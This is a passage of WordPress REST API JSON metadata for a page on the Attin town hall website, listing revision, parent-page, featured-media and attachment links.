53\/revisions"}],"predecessor-version":[{"id":2637,"href":"https:\/\/www.attin-mairie.fr\/index.php?rest_route=\/wp\/v2\/pages\/53\/revisions\/2637"}],"up":[{"embeddable":true,"href":"https:\/\/www.attin-mairie.fr\/index.php?rest_route=\/wp\/v2\/pages\/38"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.attin-mairie.fr\/index.php?rest_route=\/wp\/v2\/media\/527"}],"wp:attachment":[{"href":"https:\/\/www.attin-mairie.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=53"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}